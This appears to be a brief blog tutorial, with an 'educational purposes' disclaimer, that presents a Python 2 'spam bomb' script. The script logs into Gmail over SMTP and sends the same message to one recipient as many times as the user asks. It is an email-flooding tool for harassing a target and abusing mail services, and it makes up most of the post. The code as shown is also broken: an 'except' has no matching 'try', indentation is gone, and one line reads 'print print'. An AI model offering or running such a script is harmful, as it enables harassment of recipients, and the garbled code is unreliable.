What you are about to see is for educational purposes only. Under no circumstances shall we have any liability to you for any loss or damages of any kind incurred as a result
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Another series of code with me. Let's code up some program that will send a mail to a recipient. Going black, let's get to the thrill part, as we are to code our simple SPAM BOMB.
import smtplib
iter8 = int(raw_input("How many time you like to send? ")) #needed for range(n) returns string. We must mapped this to int coz that's what we needed
smtp_body = raw_input(" Message: ")
for i in range(iter8):
smtpObj = smtplib.SMTP('smtp.gmail.com',587) #with 587 as port number , the default for email cliend and outgoing server submits an email routed to a proper mail server
smtpObj.starttls() #for encrypted communication
smtpObj.login('username','password') #enter your desired email credentials
smtpObj.sendmail('username', 'recepient',
'Subject: Hi there. \n' + smtp_body) #set your recepient email on the second paramater. This is the syntax for sending message
print "+++++++++Message Sent+++++++++"
print "Iteration #", i+1 #to keep track of the number o iterations. i+1 for loop start at 0.
except Exception as e:
print "Failed sending mail due to "
print e
print print "Iteration #", i+1 #if above conditions are not met
Here's the video output from Youtube
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